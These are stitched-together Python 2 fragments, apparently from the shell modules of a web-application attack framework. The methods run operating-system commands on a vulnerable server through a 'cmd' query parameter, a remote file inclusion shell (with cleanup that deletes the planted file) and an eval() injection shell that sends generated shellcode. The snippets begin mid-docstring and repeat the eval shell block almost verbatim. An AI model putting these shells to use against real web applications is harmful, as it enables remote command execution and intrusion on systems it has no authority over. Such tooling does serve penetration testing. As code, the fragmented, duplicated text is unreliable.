def execute(self, command): """ This method executes a command in the remote operating system by exploiting the vulnerability. :param command: The command to handle ( ie. "ls", "whoami", etc ). :return: The result of the command. """ to_send = self.exploit_url + command to_send = URL(to_send) response = self._uri_opener.GET(to_send) return shell_handler.extract_result(response.get_body())
def execute(self, command): """ This method is called when a user writes a command in the shell and hits enter. Before calling this method, the framework calls the generic_user_input method from the shell class. :param command: The command to handle ( ie. "read", "exec", etc ). :return: The result of the command. """ to_send = self.get_exploit_URL() to_send.querystring = u'cmd=' + command response = self._uri_opener.GET(to_send) return shell_handler.extract_result(response.get_body())
:param command: The command to handle ( ie. "read", "exec", etc ). :return: The result of the command. """ mutant = self._exploit_mutant.copy() uri = mutant.get_uri() uri.querystring.update([('cmd', [command])]) try: http_res = self._uri_opener.send_mutant(mutant) except BaseFrameworkException, w3: return 'Exception from the remote web application: "%s"' % w3 except Exception, e: return 'Unhandled exception from the remote web application: "%s"' % e else: return shell_handler.extract_result(http_res.get_body()) def end(self): """ Finish execution, clean-up, remove file. """ om.out.debug('Remote file inclusion shell is cleaning up.') try: self._rm_file(self._exploit_mutant.get_token_value()) except Exception, e: msg = 'Remote file inclusion shell cleanup failed with exception: %s' om.out.error(msg % e) else: om.out.debug('Remote file inclusion shell cleanup complete.') def get_name(self):
This method executes a command in the remote operating system by exploiting the vulnerability. :param command: The command to handle ( ie. "ls", "whoami", etc ). :return: The result of the command. """ # Lets send the command. mutant = self.get_mutant() mutant = mutant.copy() mutant.set_token_value(self.shellcode_generator(command)) try: response = self._uri_opener.send_mutant(mutant) except BaseFrameworkException, w3: msg = 'An error occurred while trying to exploit the eval()'\ ' vulnerability (sending command %s). Original exception:' \ ' "%s".' om.out.debug(msg % (command, w3)) return 'Unexpected error, please try again.' else: return shell_handler.extract_result(response.get_body()) def get_name(self): return 'eval_shell' def __reduce__(self): """ Need to define this method since the Shell class defines it, and we have a different number of __init__ parameters. """ return self.__class__, (self._vuln, None, None, self.shellcode_generator)
exploiting the vulnerability. :param command: The command to handle ( ie. "ls", "whoami", etc ). :return: The result of the command. """ # Lets send the command. mutant = self.get_mutant() mutant = mutant.copy() mutant.set_token_value(self.shellcode_generator(command)) try: response = self._uri_opener.send_mutant(mutant) except BaseFrameworkException, w3: msg = 'An error occurred while trying to exploit the eval()' \ ' vulnerability (sending command %s). Original exception:' \ ' "%s".' om.out.debug(msg % (command, w3)) return 'Unexpected error, please try again.' else: return shell_handler.extract_result(response.get_body()) def get_name(self): return 'eval_shell' def __reduce__(self): """ Need to define this method since the Shell class defines it, and we have a different number of __init__ parameters. """ return self.__class__, (self._vuln, None, None, self.shellcode_generator)
def extract_result(self, http_response): try: return shell_handler.extract_result(http_response.get_body()) except BaseFrameworkException: return None